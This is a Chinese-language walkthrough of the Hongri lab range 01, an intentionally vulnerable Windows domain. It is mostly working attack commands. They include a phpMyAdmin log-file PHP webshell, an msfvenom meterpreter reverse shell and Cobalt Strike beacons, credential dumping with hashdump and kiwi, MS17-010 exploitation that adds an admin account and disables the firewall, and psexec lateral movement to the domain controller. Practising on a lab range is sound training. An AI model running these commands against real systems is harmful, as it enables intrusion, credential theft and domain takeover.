红日靶场01 一、环境搭建
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 kali+CS 192.168.43.33 win7----admin@123 外网:192.168.43.17 内网:192.168.52.143 可以Ping通外网 通192.168.52.138(win2008) 通192.168.52.141(win2003) 小皮必须是自带的,下载的新版本会导致kali机连接目标失败 问题原理:自行理解 win2008---admin@123 192.168.52.138 win2003---admin@123 192.168.52.141 内网两台不出网win互通 win7开启phpstudy win11访问80端口得到phpstudy探针
二、外网渗透 一、信息收集 端口扫描 1 2 3 4 nmap -A -p -min-rate 10000 192.168.43.17 #发现开启了80,3306端口 #访问发现80端口是php探针 #得到了探针的绝对路径 C:/phpst2016/WWW/l.php
目录爆破 1 2 3 dirsearch -u http://192.168.43.17 #出了一些有用信息 #phpMyadmin,phpinfo.php,l.php,
访问phpMyadmin 1 2 3 #发现是一个后台界面 #直接弱口令登录成功 root root
弱口令登录成功
拿到webshell 1 2 3 4 5 #通过日志文件写入一句话来获取webshell: #写入webshell-网站根目录下shell,把日志log改为php SET global general_log = 'ON' SET global general_log_file= 'C:/phpst2016/WWW/shell.php' select "<?php eval($_POST['111']);?> "
蚁剑连接shell.php 1 2 3 4 #打开蚁剑 #新建连接 #输入URL:http://192.168.43.17/shell.php #输入密码:111
信息收集 1 2 #发现目标存在yxcms,尝试访问 #在首页发现了后台地址和管理员账密
![YXCMS (2)](assets/YXCMS 2-20231108125832-qjzn04w.png)
进入yxcms后台 1 2 3 #网址输入:http://192.168.43.17/yxcms/index.php?r=admin #admin #123456
利用文件上传
蚁剑连接 1 2 3 4 5 #小提一下,马子上传了,不知道马子绝对路径怎么办? #前面我们不是发现phpstudy文件夹下存在beifen.rar #猜测应该是yxcms的备份文件 #解压之后,可通过查找acomment.php文件来确定文件上传的路径 #/yxcms/protected/apps/default/view/default
1 #URl:http://192.168.43.17/yxcms/protected/apps/default/view/default/cmsshell.php
后渗透 后渗透阶段,当我们已经将小马上传到web服务器上时,可以用webshell管理工具进行下一步渗透了。
蚁剑终端关闭win7防火墙 1 2 3 4 #关闭win防火墙 netsh advfirewall set allprofiles state off #查看防火墙配置状态 netsh advfirewall show allprofile state
msf生成exe并开启监听 1 2 3 4 5 6 7 8 9 10 11 12 #kali创建后门程序 msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.43.33 LPORT=10888 -f exe -o 233.exe #蚁剑上传233.exe #蚁剑终端运行233.exe #kali开启监听,设置sessions use exp/multi/handler set payload windows/x64/meterpreter_reverse_tcp set lhost 192.168.43.33 set lport 10888 run
拿到win7shell 1 2 3 4 5 6 7 #尝试提权 #因为是administrator用户, #所以很容易提权成功。 shell getuid getsystem getuid
利用msf进行内网信息收集 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 chcp 65001 ---可解决乱码问题 route print ---锁定内网C段 net time /domain ---锁定域控192.168.52.138 net user /domain ---锁定域内五个账户 ipconfig /all ---锁定域名 net view ---锁定域内主机 net group "domain admins" /domain ---查询域管理员 ------------ 域名:god.org 域内五个用户:Administrator、Guest、liukaifeng01、ligang、krbtgt 域内三台主机:OWA(win2k8)、ROOT-TVI862UBEH(192.168.52.141)、STU1(win7) 域控:OWA(192.168.52.138) win7内网ip:192.168.52.143 ------------
hashdump 1 hashdump ---导出本地用户账号密码,该命令的使用需要系统权限。
1 2 3 4 5 #CMD5解密 ---#hash解密为空: ---#因为当系统为win10或2012R2以上时, ---#默认在内存缓存中禁止保存明文密码,密码字段显示为null, ---#需要修改注册表等用户重新登录后才能成功抓取。
抓取域内账密 1 2 3 4 5 #利用msf的kiwi模块+system权限 load kiwi #加载kiwi模块 help kiwi #查看kiwi模块的使用 creds_all #列举所有凭据 creds_kerberos #列举域内账密 Administrator admin@123
![load kiwi+creds_all](assets/load kiwi+creds_all-20231108133200-gn82sit.png)
CS上线win7 1 2 3 4 5 6 7 8 9 10 11 12 #楼楼用的是tools的CS #CS的基本使用楼楼就不做多说明了 #kali机作为服务端,本地win11为客户端 #服务端启动 ./teamserver 192.168.43.33 123456 # 这里的ip是服务端ip,后续客户端连接此ip登录 win11: 直接运行runcatcs.vbs即可(仅限windows), 其他系统执行:java -jar cat_client.jar client #设置监听器 #生成木马-->artifactHRmsf.exe
1 2 3 #蚁剑上传artfactHRmsf.exe到win7 #运行木马程序 #CS上线成功
1 2 3 #简单提权 elevate ---#提权成功 sleep 1 ---#设置回弹时间间隔
横向渗透 为了让 msf 能访问内网的其他主机,即 52 网段的攻击流量都通过已渗透的这台目标主机(Win7)的meterpreter会话来传递,需要建立socks反向代理。
socket代理 1 2 3 #添加代理 run autoroute -s 192.168.52.0/24 # 添加内网的路由 run autoroute -p # 查看路由
1 2 3 4 5 6 7 8 #开启代理 background #将此会话保存为一个sessions use auxiliary/server/socks_proxy set VERSION 4a set SRVPORT 9080 set SRVHOST 127.0.0.1 run jobs #运行后挂起一个job
1 2 3 4 5 6 #修改配置文件 #在proxychains的配置文件 vim /etc/proxychains4.conf #添加本机的1080端口: socks4 127.0.0.1 1080 #ping 域内成员
漏洞扫描 1 2 3 4 5 #利用nmap对域内主机进行漏洞扫描 nmap --script=vuln 192.168.52.141 nmap --script=vuln 192.168.52.143 nmap --script=vuln 192.168.52.138 #发现都存在ms17_010漏洞
msf利用ms17-010 1 2 3 4 5 6 search ms17-010 use 2 set RHOST 192.168.52.141/143/138 set COMMAND net user run #发现除了win7。win2k3,win2k8都可以利用成功
尝试给域控win2k8添加管理员 1 2 3 4 5 6 #添加管理员 set COMMAND net user awy233 awy@233 /add set COMMAND net user set COMMAND net localgroup administrators awy233 awy@233 /add set COMMAND net localgroup administrators #添加成功,但3389毫无反应
尝试开启域控3389端口 1 2 3 4 5 6 #关闭防火墙 set COMMAND netsh advfirewall set allprofiles state off #3389 set COMMAND wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 set COMMAND REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f #登不上,不知道为什么
![屏幕截图 2023-11-08 141233](assets/屏幕截图 2023-11-08 141233-20231108141247-33xzu1g.png)
利用SMB Beacon拿下域控 1 2 3 4 5 6 7 8 9 10 11 12 #使用条件: #具有 Beacon 的主机必须接受 445 端口上的连接。 #只能链接由同一个 Cobalt Strike 实例管理的 Beacon。 #必须有目标主机的管理员权限或者说是拥有具有管理员权限的凭据。 #新建监听器 #payload选择Beacon SMB #右键域控,选择psexec攻击 #设置参数 #成功
![屏幕截图 2023-11-08 142244](assets/屏幕截图 2023-11-08 142244-20231108142358-dpyzs40.png)